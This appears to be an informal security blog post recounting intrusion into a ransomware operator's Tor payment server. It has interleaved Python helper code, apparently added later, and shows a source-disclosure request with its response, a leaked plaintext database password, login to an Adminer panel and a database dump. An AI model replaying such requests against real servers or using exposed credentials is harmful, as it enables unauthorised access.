" Cryptolocker … you little shit. | TGHC


So, readers, if you already know me personally you know what to expect; if you don’t, you might have a hard time with my writing skills (I mean lack of)… I’m quite terrible at it, but the information is accurate. If it frustrates you, maybe best you don’t scroll down.


- Looking at some of the feedback from the infosec community, I’d say what I was dealing with was a variant of ransomware similar to Cryptolocker. When I wrote the post below I had the assumption it was Cryptolocker, so apologies for the inadvertent link-baiting.

A friend of mine had recently been stung by Cryptolocker so I thought I’d have a look at it. Cryptolocker basically encrypts certain file types you have access to (your files) and says “You pay me, bro, if you want to see them files again… soon”… it has your files and there is a timer on how long you have to decide to pay or lose those files. Not cool.

The way the bad guys want paying is usually via Bitcoin over the Tor network. In their graphic they explain how to download the Vidalia Tor bundle so you can reach the .onion website (websites hosted on the Tor network do not resolve over common DNS and always end in .onion). What’s cool for us is that the graphic presented on my pal’s machine is static, so the address that is presented always has to be that address; they have to keep the box online *cough-its-still-there-cough*. Anyway, I took the address 4sfxctgp53imlvzk.onion.

To get myself in a comfortable position to have a good old poke around I hooked up Burp Suite Pro, Firefox and Tor. The settings were: use SOCKS proxy, host 127.0.0.1, port 9050. Cool, piece of piss.
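The two checks worth scripting before pointing any tool at an address like the one above, as an added example (this is not code from the post): that the name is a well-formed .onion address, and that the SOCKS proxy is configured so the hostname is resolved by Tor rather than by the local resolver. The `socks5h://` scheme, the `requests` library and the `fetch` helper are my choices, not the post’s; `fetch` is the only part that needs a running Tor and is not exercised offline.

```python
import re
from urllib.parse import urlsplit

# Tor's default SOCKS port, the same host:port the post points Burp at.
TOR_SOCKS = "socks5h://127.0.0.1:9050"

# v2 onion names are 16 base32 chars (a-z, 2-7); v3 names are 56.
ONION_RE = re.compile(r"^(?:[a-z2-7]{16}|[a-z2-7]{56})\.onion$")


def is_onion_host(host: str) -> bool:
    """True if `host` is syntactically a .onion name (v2 or v3)."""
    return bool(ONION_RE.match(host.lower()))


def resolves_inside_tor(socks_url: str) -> bool:
    """socks5h:// hands hostname resolution to the proxy (Tor);
    plain socks5:// resolves locally, which fails for .onion and leaks
    the name to the local DNS resolver."""
    return urlsplit(socks_url).scheme == "socks5h"


def tor_proxies(url: str, socks_url: str = TOR_SOCKS) -> dict:
    """Build a requests-style proxies dict, refusing setups that would
    resolve the .onion name outside Tor."""
    host = urlsplit(url).hostname or ""
    if not is_onion_host(host):
        raise ValueError(f"{host!r} is not a .onion name")
    if not resolves_inside_tor(socks_url):
        raise ValueError("use socks5h:// so Tor resolves the .onion name")
    return {"http": socks_url, "https": socks_url}


def fetch(url: str):
    """Optional live request through Tor (needs `requests[socks]` and a
    tor daemon on 127.0.0.1:9050). Hypothetical helper, not run offline."""
    import requests  # imported lazily so the offline checks need no deps
    return requests.get(url, proxies=tor_proxies(url), timeout=60)


if __name__ == "__main__":
    target = "http://4sfxctgp53imlvzk.onion/"  # the address from the post
    print(tor_proxies(target))
```

Burp has the equivalent switch in its SOCKS proxy settings (“Do DNS lookups over SOCKS proxy”); without it, or with a `socks5://` proxy in a script, the .onion name never reaches Tor.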

Burp Tor


Luckily for me Steve Lord was hanging out with me this night; we’d just had some grub and were drinking whiskey and watching Super Jail, politely chipping away. Some not very useful stuff turned up: on an app test I would report it, but for my goals… I need to get in, not to improve posture. SO… a while back, on Dec 20th 2013, I noticed an issue with some ransomware echoing out its localhost connection details when requesting favicon from its server (https://twitter.com/torservers/status/414060509382455296, http://pastebin.com/Uq37CDR3). I thought I’d see if the same issue worked here (why not, I have whiskey, cartoons and a Steve Lord). Didn’t quite work… but this did…

GET /index.php%3C HTTP/1.1
Host: 4sfxctgp53imlvzk.onion
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7ms6io53cb73k3u47n4jivr4c5
Connection: keep-alive

Returned this

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 16 Feb 2014 02:07:25 GMT
Content-Type: application/octet-stream
Content-Length: 12931
Last-Modified: Sun, 16 Feb 2014 00:17:41 GMT
Connection: keep-alive
Accept-Ranges: bytes

<?php
session_start();
define('DBHOST', 'localhost');
define('DBUSER', 'site');
define('DBPASS', 'Be6mybCWhpFpgG4u'); //Dostep do sql za miana!!!  <-- Polish, roughly: "SQL access, change it!!!"
define('DBNAME', 'site');
mysql_connect(DBHOST, DBUSER, DBPASS);
mysql_select_db(DBNAME);
$errors = $success = "";
if(isset($_GET['captcha']) && $_GET['captcha'] == 1){
    include('kcaptcha6791/kcaptcha.php');
    $captcha = new KCAPTCHA();
    if($_REQUEST[session_name()]){
        $_SESSION['captcha_keystring'] = $captcha->getKeyString();
    }
    exit(); blah blah blah...
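The check I would script after seeing an exchange like the one above, as an added example (not code from the post): parse the raw response, flag a PHP source disclosure (a request naming a .php file answered with something other than HTML whose body starts with `<?php`), and pull the `define('DB...')` credentials out so they are recorded. The response text is reconstructed from the post and truncated as there. The `location ~ \.php$` pattern is an assumption about the server’s nginx configuration, which the post does not show; it is here only to illustrate why a trailing `<` makes a .php request miss the PHP handler and fall through to the static file handler.

```python
import re

# Reconstructed from the response shown in the post (truncated, as there).
CAPTURED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.2.1\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 12931\r\n"
    "\r\n"
    "<?php\n"
    "session_start();\n"
    "define('DBHOST', 'localhost');\n"
    "define('DBUSER', 'site');\n"
    "define('DBPASS', 'Be6mybCWhpFpgG4u');\n"
    "define('DBNAME', 'site');\n"
    "mysql_connect(DBHOST, DBUSER, DBPASS);\n"
)

# Assumed nginx rule handing PHP to FastCGI: location ~ \.php$
# A path like /index.php< does not end in .php, so it never reaches it.
PHP_LOCATION = re.compile(r"\.php$")

# define('DBHOST', 'localhost');  -> ('DBHOST', 'localhost')
DEFINE_RE = re.compile(r"define\('(DB[A-Z]+)',\s*'([^']*)'\);")


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into (status, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def routed_to_php(path: str) -> bool:
    """Would the assumed location regex pass this path to PHP?"""
    return bool(PHP_LOCATION.search(path))


def is_php_source_disclosure(path: str, raw: str) -> bool:
    """A .php resource served raw: 200, non-HTML content type, body is PHP."""
    status, headers, body = parse_response(raw)
    return (
        status == 200
        and ".php" in path
        and not headers.get("content-type", "").startswith("text/html")
        and body.lstrip().startswith("<?php")
    )


def extract_db_defines(body: str) -> dict:
    """Collect DB* constants from leaked PHP config source."""
    return {name: value for name, value in DEFINE_RE.findall(body)}


def has_dos_wildcards(path: str) -> bool:
    """Deny rule worth putting in front of the static handler: characters
    that are never legitimate in a file name under the web root."""
    return any(c in path for c in '<>"*?')


if __name__ == "__main__":
    path = "/index.php<"  # %3C from the request, URL-decoded
    print("routed to PHP:", routed_to_php(path))
    print("source disclosure:", is_php_source_disclosure(path, CAPTURED_RESPONSE))
    _, _, body = parse_response(CAPTURED_RESPONSE)
    print("credentials:", extract_db_defines(body))
```

What the captured exchange establishes is that the request missed the PHP handler and was served by the static one, which is the condition to test for on any PHP-behind-nginx target: a path containing a .php file name answered with a non-HTML content type and a body starting with `<?php`. How `index.php<` came to resolve to `index.php` on disk is not shown in the post; on Windows hosts the filesystem API treats `<` as a wildcard, which is the usual explanation for this pattern, but that is inference rather than something the post confirms.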

Sweet, that might come in handy later… Anyway, I picked away at it for a good 90 minutes looking at known vulns on the web server (DoS) and seeing what the value was of the issues found so far (little XSS, possible DoS and some lesser crap). Not very meaningful to the goal, and if it’s DoSed then other people may miss out on recovery (if they are willing to pay).

Got pissed with Steve, passed out.

Next day, I see Steve off and drag my arse down to my local greasy spoon cafe, but before I do, I hook up DirBuster and set up a 2nd Burp listener to push it through. I push it through Burp so it resolves via Burp’s Tor configuration, and I set up a 2nd listener to separate tools: 8080 does browser, 8088 does DirBuster, and so on and so forth, using Burp’s filter-by-port feature (nice)… Off I go. Later on in the afternoon I have one of those “Oh shit yeah, I was hacking something” thoughts and get back to my box. Nope, nope, nope, nope… nothing exciting. BUT WAIT

Black-dynamite-you-done-fd-up-now


What is this? A 301 redirect to /mysql/. I don’t have the screenshot of the login at hand, but if I find it I’ll modify this bit. I’m greeted with the web interface of some software called Adminer, version 3.7.1, and the information it requires is a username, a password and a database. Because this is on the box I can use the details from yesterday! Sweet.

  • Can I read from the hard disk to reach /etc/hosts or possibly even the key?!
  • Can I identify its public IP / hostname?

Not really :/

Partial hostname is DS791732 (if that means anything to anyone, speak up). A few more hours after I got into this area they were on to me, and I can no longer reach the /mysql interface :( but the link is still there taking money. I think they flush it now and then; I only saw 12 entries, some paid, some probes. I took a dump of the database and a few screenshots. I thought you lot might like this as a read… I’d be interested to see if anyone else can cause these little shits a headache… I imagine there is more to come.


Screen Shot 2014-02-03 at 11.12.27

As a limited user I could view a bit of the database.


Screen Shot 2014-02-01 at 19.14.55

Tool Kit

  1. Tor
  2. Firefox
  3. Burpsuite (Pro ?) / Free
  4. DirBuster
  5. OS … whatever